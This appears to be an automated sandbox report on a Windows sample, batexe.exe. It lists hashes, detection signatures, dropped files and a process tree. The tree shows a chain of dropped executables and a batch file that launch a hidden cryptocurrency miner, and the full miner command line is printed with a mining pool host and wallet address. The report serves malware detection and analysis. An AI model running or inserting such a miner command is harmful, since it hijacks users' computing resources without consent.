73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
298s
max time network
306s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
19-02-2024 16:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3060	b2e.exe
1568	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1568	cpuminer-sse2.exe
1568	cpuminer-sse2.exe
1568	cpuminer-sse2.exe
1568	cpuminer-sse2.exe
1568	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3912-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3912 wrote to memory of 3060	3912	batexe.exe	72
PID 3912 wrote to memory of 3060	3912	batexe.exe	72
PID 3912 wrote to memory of 3060	3912	batexe.exe	72
PID 3060 wrote to memory of 2336	3060	b2e.exe	73
PID 3060 wrote to memory of 2336	3060	b2e.exe	73
PID 3060 wrote to memory of 2336	3060	b2e.exe	73
PID 2336 wrote to memory of 1568	2336	cmd.exe	76
PID 2336 wrote to memory of 1568	2336	cmd.exe	76

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3912
- C:\Users\Admin\AppData\Local\Temp\1587.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1587.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1587.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1B05.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2336
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1587.tmp\b2e.exe

Filesize
331KB

MD5
9606c598e57233896a0ba8c0d9fd14cc

SHA1
536bd95f98a510bad4fdcd891f1d082ded93fce9

SHA256
f9154aedb5849241153318e0bd29e56a6d919af13829dd0b7f6026682910569d

SHA512
ccd836209771f182492cf0128128865c251be0e694a7656600edfb8a3e10180c26f6fd441c01c55a310044f26355386a5d98637c702bb877ca0b7343427a749c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1587.tmp\b2e.exe

Filesize
446KB

MD5
c900ecc6b7350870addd6528de3e8715

SHA1
aef39891a2ecf7ce4a088f2c3f35d5015debf02b

SHA256
e8d729b51d0750d28a96981933c073b6ae453ce7491de837de4f2ce112007a03

SHA512
7b38826735a29ab53a99279e07b40b132fdbbb31d243df6ca8b3973fe53bc3f3805b5b08bbb3c19322dca84b01f8c60b5f0da675b09759d728e69db557c7a481

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B05.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
301KB

MD5
abb4a36a873c0a534f43a7157d4ccb56

SHA1
a87f5537ff155208911af7ae5008cc75c3ee51e0

SHA256
65b2a0b6f3b8a16e074c4e88f075ab8adc3cfcccc3e937b23f9ed6c5b4785687

SHA512
dbe014fc99d27a71d536b0289d8475126412f3d48aba5180b0987bb13f6b8e612b2b1e25b7873ad40e4b5c29458383be06f15db00ac5f142d1d351117b80e6be

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
297KB

MD5
169d4b907c9781ca0284c56e5ca621bc

SHA1
e936bfed95a95c8cfb304d9d904d64200b716a4e

SHA256
bb35ea5f3fc6384c44454cded5d5498ad332b6bc1e4aa18ffb931008b437c2a0

SHA512
2d2d8364febf726b171d1191e2362e60e338e8bf1d43fc0d46fa8776c74673abf9fec9c95b2ac5f08a8d45b55d42385778b18041103057d32a13b707bf904eaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
373KB

MD5
3935bb773b49bb0e174be1d46cc8847d

SHA1
205767da05499d0bc5d6d881437e951a0bd5a814

SHA256
5eba51f1820249334ee8ac4df52cc5c3eebca4b47460ee79499efdd83abc4b10

SHA512
5e6f987b970b274928d11d2f2c69b4c5070649979a355e3a022a37777f9f669839e1b97d9bc9bb8d9e3a61557acea6e9d64903502db581e69284a8b9b4a05499

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
295KB

MD5
f682452a12885e6d6dc517efaa31e27b

SHA1
22bf0570e7271e0502d67374fabaf0a73efc9472

SHA256
a6bb1ebe7012be74d70b1122bdb699d1a2857cde48b91ab73fd39b102c4ddd90

SHA512
eac87c629e89dce1ede4557da537d838629f5d2ae5338d6e2cfdc173189619b40e840441b6ec38a5c2f33aa5f8f35c2955bea5cd1838a2d3cf787a75ef33fa89

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
353KB

MD5
2bfbf3398d43f3efd8f05a6ab93caa05

SHA1
dc24cc9c8055499d7bcd7f86f02a9d0f6f257caf

SHA256
831e27a1554036554e6ec7db999834c03f7ff0d80f963879f99c214395dd0d52

SHA512
bd6d067be856300ddc382d4006f0e07b00377e22bceca2a0da7b6876c5fd26000df81c66d206085261dfba698567eb94ab69c3039911b88a75ea3a5b891bed13

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
369KB

MD5
80f755f851466966174d0510704c2278

SHA1
9d859ba73b749b36cb2852f0950edd427d0db834

SHA256
07a32ffc25f34026849236cad71f59dac245cc25552f06ef76e81a2e26ff02e1

SHA512
b99832b17d0f59503f8716152bee13bfec935bf97adbf5d71fa55b35a5412d2ce65552f159d6b93126f7bfbde28324228b98103199b8692c3bff4f9128ca6ae9

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
450KB

MD5
b9b1366d711274790056c35be49ed792

SHA1
3d46d50fd10380aa95a8c9173689ebf39fca08fe

SHA256
e4e487fb24277594b1f4d00ec1f2757dafd074981cbc82ba220fac3d74aa0b31

SHA512
a1aba1c517536bf5d5da43c85295ee05b869d1478bd31ad5d4da3702f132af15ec1b9abc9a408406ff886b06b9690f26cbf5d19366da9429025a93a30ad8f103

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
182KB

MD5
9c1c63ec9ade75cd817a871d612ef7f0

SHA1
7773625ede45a2d11f5058d3aff2b15eb055b227

SHA256
3be9bfe453deee8f9f76d014ec6ea37ad7b12eb54b21cd6131b4a3fd4b5d1d06

SHA512
bc979e7dc0239787e9f4cbef4ad70a0126fb1f6327d72b6d2ca83afae604c11dae4911fda0493a3fd4011d6559c0238c44e0301d39b90a9a8535c5774a2af044

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
239KB

MD5
411e2a81d5873c695010b83c7dbf3fe7

SHA1
5cf0f6a96574498ea8af80096615d1a747616ac4

SHA256
1b04dacbb98504f2be1e64bd92681eca012199b242273a996d862927851d1c9a

SHA512
2e2505a7c99454627a6d9acc47a751b2d6c9271cececab815195ba905b4949e987fad8d3f4a3b8ba9d5983bad4500a524ca18234a9b9d32cc8e8cafd71a3c96b

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
280KB

MD5
9c89a452b9689601ced9c980a1dcd152

SHA1
190771515a3d8101856b28b6622dbc8ec67d4a3a

SHA256
9a1833f8523f29f85e5c9a5eb2704e3d0d603ec616256b0d2d68af56d4aa219d

SHA512
dae74fe677e8f9db6051ae99b48c385f87d4ba62ca0d3e5db39593d869b8950b886914091eec653c078ac299a829b25144e180f8712fc63a9eb33590cab78277

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
277KB

MD5
39bebd97a5f62d2ceef32fcf893b88a2

SHA1
b36a405c7f4ad7e8f20414764de73f55d207ce9b

SHA256
3bf299ecc725655963d178c2afbf796475145fddcf4bb78c677cfcd853759a09

SHA512
c3c1c155eebf051d266e76f318258fb3bdb53958332235f3c97754fd05634e2bd533cc9a9ae8d661d38a2551a7aa521c192b28229594d534c9db27df99a97d3f

Download Submit
memory/1568-44-0x0000000001030000-0x00000000028E5000-memory.dmp

Filesize
24.7MB

Download
memory/1568-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-43-0x0000000074E60000-0x0000000074EF8000-memory.dmp

Filesize
608KB

Download
memory/1568-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1568-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1568-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3060-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3060-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3912-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download